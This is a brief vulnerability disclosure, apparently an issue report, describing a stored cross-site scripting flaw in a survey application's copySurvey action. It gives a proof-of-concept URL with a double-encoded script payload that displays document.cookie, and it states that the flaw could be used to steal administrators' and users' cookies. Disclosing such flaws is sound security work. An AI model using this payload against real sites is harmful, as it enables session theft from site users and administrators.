There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or stole admin's or other users cookies when copy the survey

Vulnerability file:
/design/my-survey-design!copySurvey.action

PoC:
/design/my-survey-design!copySurvey.action?surveyName=A%2520test%25EF%25BC%258Dcopy%2522%252F%253E%253Cscript%253Ealert%28document.cookie%29%253C%252Fscript%253E